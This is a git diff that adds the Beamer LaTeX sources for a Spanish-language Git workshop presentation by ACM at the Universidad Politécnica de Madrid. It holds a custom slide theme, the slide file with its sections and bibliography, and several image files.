+++ b/git/present/beamerthemeACM.sty
@@ -0,0 +1,68 @@
+\usetheme{Rochester}
+
+\RequirePackage{pgf}
+
+\pgfdeclareimage[width=1.0\paperwidth]{cabecera}{cabecera}
+
+\setbeamertemplate{blocks}[rounded][shadow=true]
+\setbeamercovered{transparent}
+
+\beamer@headheight=0.14\paperwidth
+
+\definecolor{oxygenorange}{HTML}{F7800A}
+\definecolor{oxygengray}{HTML}{686868}
+\definecolor{oxygenlightgray}{HTML}{EEEEEE}
+\definecolor{oxygenblue}{HTML}{236EAF}
+\setbeamercolor*{Title bar}{fg=white}
+\setbeamercolor*{Location bar}{fg=oxygenorange,bg=oxygenlightgray}
+\setbeamercolor*{frametitle}{parent=Title bar}
+\setbeamercolor*{block title}{bg=oxygenblue,fg=white}
+\setbeamercolor*{block body}{bg=oxygenlightgray,fg=oxygengray}
+\setbeamercolor*{normal text}{bg=white,fg=oxygengray}
+\setbeamercolor*{section in head/foot}{bg=oxygenblue,fg=white}
+
+\usecolortheme[named=oxygenorange]{structure}
+
+\setbeamerfont{section in head/foot}{size=\tiny,series=\normalfont}
+\setbeamerfont{frametitle}{size=\Large}
+
+%\setbeamertemplate{headline}
+\setbeamertemplate{frametitle}
+{
+ \vskip-0.25\beamer@headheight
+ \vskip-\baselineskip
+ \vskip-0.2cm
+ \hskip0.7cm\usebeamerfont*{frametitle}\insertframetitle
+ \vskip-0.10em
+ \hskip0.7cm\usebeamerfont*{framesubtitle}\insertframesubtitle
+}
+
+\setbeamertemplate{headline}
+{
+ \pgfuseimage{cabecera}
+ \vskip -1.95cm
+ \linethickness{0.0pt}
+
+ \framelatex{
+ \begin{beamercolorbox}[wd=\paperwidth,ht=0.3\beamer@headheight]{Title bar}
+ \usebeamerfont{section in head/foot}%
+ %\insertsectionnavigationhorizontal{0pt}{\hskip0.22cm}{}%
+ \end{beamercolorbox}}
+
+ \framelatex{
+ \begin{beamercolorbox}[wd=\paperwidth,ht=0.7\beamer@headheight]{Title bar}
+ \end{beamercolorbox}}
+}
+
+\setbeamertemplate{footline}
+{
+ \linethickness{0.25pt}
+ \framelatex{
+ \begin{beamercolorbox}[leftskip=.3cm,wd=\paperwidth,ht=0.3\beamer@headheight,sep=0.1cm]{Location bar}
+ \usebeamerfont{section in head/foot}%
+ \insertshortauthor~|~\insertshorttitle
+ \hfill
+ \insertframenumber/\inserttotalframenumber
+ \end{beamercolorbox}}
+}
+
diff --git a/git/present/cabecera.png b/git/present/cabecera.png
new file mode 100644
index 0000000..5c2f81c
--- /dev/null
+++ b/git/present/cabecera.png
Binary files differ
diff --git a/git/present/git.tex b/git/present/git.tex
new file mode 100644
index 0000000..f4099d1
--- /dev/null
+++ b/git/present/git.tex
@@ -0,0 +1,95 @@
+%%%%%%%%%%%%%%%%%%%%
+% git.tex - Transparencias del curso de Git
+% Guillermo Ramos Gutiérrez <wille@acm.asoc.fi.upm.es>
+%%%%%%%%%%%%%%%%%%%%%
+
+\documentclass{beamer}
+
+\mode<presentation>
+{
+ \usetheme{ACM}
+ \setbeamercovered{transparent}
+}
+
+\usepackage[spanish]{babel}
+\usepackage[utf8]{inputenc}
+\usepackage{times}
+\usepackage{color}
+
+\title[Taller de Git]
+{Taller de Git}
+
+\author[Guillermo Ramos]
+{
+Guillermo Ramos \\
+\texttt{wille@acm.asoc.fi.upm.es}
+}
+
+\institute[ACM FI - UPM]
+{
+ACM Facultad de Informática \\
+Universidad Politécnica de Madrid
+}
+
+\date{02 de febrero de 2012}
+
+\pgfdeclareimage[height=0.7cm]{acm-logo}{acm}
+\logo{\pgfuseimage{acm-logo}}
+
+\AtBeginSection[]
+{
+ \begin{frame}<beamer>
+ \frametitle{Contenido}
+ \tableofcontents[currentsection]
+ \end{frame}
+}
+
+\begin{document}
+
+ \begin{frame}
+ \titlepage
+ \end{frame}
+
+ \begin{frame}{Contenido}
+ \tableofcontents
+ \end{frame}
+
+ \section{Local}
+ \begin{frame}{}
+ \begin{center}
+ \includegraphics[width=7cm]{img/gitlocal.png}
+ \end{center}
+ \end{frame}
+
+ \section{Remoto}
+ \begin{frame}{}
+ \begin{center}
+ \includegraphics[width=7cm]{img/gitremote.png}
+ \end{center}
+ \end{frame}
+
+ \section{}
+ \begin{frame}{}
+ \begin{center}
+ \includegraphics[width=7cm]{img/reference.png} \\
+ \vspace{1cm}
+ \footnotesize http://tinyurl.com/tallergit-reference
+ \end{center}
+ \end{frame}
+
+ \section{}
+ \begin{frame}{}
+ \textbf{Bibliografía recomendada:}
+ \begin{thebibliography}{99}
+ \bibitem{} \htmladdnormallink{Chacon, Scott. \textit{Pro Git}}{http://progit.org/}
+ \bibitem{} \htmladdnormallink{Loeliger, Jon (2009). \textit{Version Control with Git}}{http://shop.oreilly.com/product/9780596520137.do}
+ \end{thebibliography}
+ \end{frame}
+
+ \begin{frame}{}
+ \begin{center}
+ \textbf{¡Gracias por venir!}
+ \end{center}
+ \end{frame}
+
+\end{document}
diff --git a/git/present/img/dudas.jpg b/git/present/img/dudas.jpg
new file mode 100644
index 0000000..3a5599c
--- /dev/null
+++ b/git/present/img/dudas.jpg
Binary files differ
diff --git a/git/present/img/gitlocal.png b/git/present/img/gitlocal.png
new file mode 100644
index 0000000..ae2be7e
--- /dev/null
+++ b/git/present/img/gitlocal.png
Binary files differ
diff --git a/git/present/img/gitremote.png b/git/present/img/gitremote.png
new file mode 100644
index 0000000..26ad541
--- /dev/null
+++ b/git/present/img/gitremote.png
Binary files differ
diff --git a/git/present/img/reference.png b/git/present/img/reference.png
new file mode 100644
index 0000000..1b8a64c
--- /dev/null
+++ b/git/present/img/reference.png
Binary files differ